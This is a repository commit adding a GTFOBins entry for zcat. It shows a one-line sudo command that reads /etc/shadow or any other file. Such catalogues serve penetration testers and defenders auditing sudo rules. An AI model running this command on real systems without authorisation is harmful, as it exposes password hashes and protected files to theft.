mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-09-21 07:39:29 +02:00
GTFOBINS: Added zcat
This commit is contained in:
7
_gtfobins/zcat.md
Normal file
7
_gtfobins/zcat.md
Normal file
@@ -0,0 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE="/etc/shadow" # or any other file
|
||||
sudo zcat -f "$LFILE"
|
||||
---
|
Reference in New Issue
Block a user